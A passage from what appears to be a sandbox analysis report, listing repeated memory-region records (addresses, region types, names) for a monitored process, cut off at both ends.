= 8922 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8923 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8924 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8925 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8926 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8927 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8928 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8929 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8930 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8931 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8932 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8933 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8934 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8935 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8936 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8937 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8938 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8939 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8940 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8941 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8942 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8943 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8944 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8945 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8946 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8947 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8948 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8949 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8950 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8951 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8952 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8953 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8954 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8955 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8956 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8957 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8958 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8959 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8960 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8961 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8962 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8963 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8964 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8965 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8966 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8967 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8968 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8969 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8970 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8971 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8972 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8973 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8974 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8975 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8976 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 8977 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 8978 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8979 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8980 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8981 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8982 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8983 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8984 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8985 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8986 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8987 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8988 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8989 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8990 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8991 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8992 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8993 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8994 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8995 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8996 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8997 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8998 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8999 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9000 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9001 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9002 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9003 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9004 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9005 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9006 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9007 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9008 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9009 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9010 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9011 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9012 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9013 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9014 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9015 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9016 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9017 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 9018 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 9019 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9020 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9021 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 9022 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 9023 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9024 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9025 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9026 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 9027 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 9028 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9029 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9030 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9031 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9032 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9033 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9034 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9035 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9036 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9037 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9038 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9039 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9040 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9041 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9042 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9043 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9044 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9045 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9046 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9047 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9048 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9049 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9050 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9051 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9052 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9053 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9054 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9055 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9056 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9057 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9058 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9059 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9060 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9061 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9062 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9063 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9064 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9065 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9066 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9067 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9068 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9069 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9070 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9071 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9072 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9073 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9074 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9075 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9076 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9077 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9078 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9079 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9080 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9081 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9082 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9083 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 9084 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 9085 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9086 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9087 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9088 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9089 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9090 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9091 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9092 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9093 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9094 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9095 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9096 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9097 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9098 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9099 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9100 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9101 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9102 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9103 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9104 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9105 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9106 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 